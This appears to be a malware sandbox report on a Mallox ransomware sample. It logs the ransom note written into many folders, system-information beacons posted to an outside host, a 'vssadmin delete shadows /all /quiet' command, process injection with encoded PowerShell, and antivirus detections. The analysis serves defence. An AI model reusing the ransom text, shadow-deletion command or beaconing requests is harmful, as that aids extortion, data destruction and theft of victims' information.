NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\DRM\Server\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\DRM\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000280 filepath: C:\ProgramData\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000260 filepath: C:\ProgramData\Microsoft\Event Viewer\Views\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000274 filepath: C:\ProgramData\Microsoft\Event Viewer\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000274 filepath: C:\ProgramData\Microsoft\HTML Help\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000274 filepath: C:\ProgramData\Microsoft\IdentityCRL\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000384 filepath: C:\ProgramData\Microsoft\IlsCache\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000360 filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000040c filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000384 filepath: C:\ProgramData\Microsoft\Network\Connections\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000003f0 filepath: C:\ProgramData\Microsoft\Network\Downloader\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Network\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000003e4 filepath: C:\ProgramData\Microsoft\OFFICE\DATA\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000384 filepath: C:\ProgramData\Microsoft\OFFICE\Heartbeat\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000324 filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000324 filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000384 filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000288 filepath: C:\ProgramData\Microsoft\OFFICE\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000288 filepath: C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\FILE RECOVERY.txt	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (9 events)

Time & API	Arguments	Status	Return
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1
HttpSendRequestW March 11, 2023, 10:28 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=DCF98CC8BBE496C51210B008&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1836 resumed a thread in remote process 2744
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2744	1	0	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
cmdline	C:\Windows\sysnative\vssadmin.exe delete shadows /all /quiet

Creates known Upatre files, registry keys and/or mutexes (1 event)

file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CP_Common\FILE RECOVERY.txt

Generates some ICMP traffic

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

McAfee	Artemis!4F351910B30C
Sangfor	Trojan.Win32.Agent.Vgxg
CrowdStrike	win/malicious_confidence_60% (D)
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	Trojan.Gen.2
Elastic	malicious (moderate confidence)
ESET-NOD32	a variant of MSIL/GenKryptik.GHGN
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	TrojanX-gen [Trj]
TrendMicro	Ransom.Win32.TARGETCOMP.YXDCJZ
McAfee-GW-Edition	Artemis!Trojan
Webroot	W32.Trojan.Gen
ZoneAlarm	UDS:DangerousObject.Multi.Generic
AhnLab-V3	Trojan/Win.Injection.C5393375
VBA32	Downloader.MSIL.gen.rexp
TrendMicro-HouseCall	Ransom.Win32.TARGETCOMP.YXDCJZ
MaxSecure	Trojan.Malware.300983.susgen
AVG	TrojanX-gen [Trj]

Executed a process and injected code into it, probably while unpacking (30 events)

Time & API	Arguments	Status	Return
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1836	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1836	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 1836	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 1836	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x000003a0 suspend_count: 1 process_identifier: 1836	1	0
NtGetContextThread March 11, 2023, 10:28 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread March 11, 2023, 10:28 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 1836	1	0
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 2144 thread_handle: 0x000004b4 process_identifier: 2140 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA== filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004bc	1	1
CreateProcessInternalW March 11, 2023, 10:28 a.m.	thread_identifier: 2748 thread_handle: 0x0000039c process_identifier: 2744 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\a-Yfgvvxyduvu.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000524	1	1
NtGetContextThread March 11, 2023, 10:28 a.m.	thread_handle: 0x0000039c	1	0
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 2744 region_size: 176128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000524	1	0
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $l!aâ(@±(@±(@±M&°"@±M& °±@±* °@±°9@±°<@±M&°)@±M&°;@±M&°;@±(@±@±\+°%@±\+ð±)@±\+ °)@±Rich(@±PEL±WÍcàrün@°@ÜÈà¸8Ü8@Ì.textpr `.rdatav@@.dataHK0@À.rsrcà@@.reloc¸@B base_address: 0x00400000 process_identifier: 2744 process_handle: 0x00000524	1	1
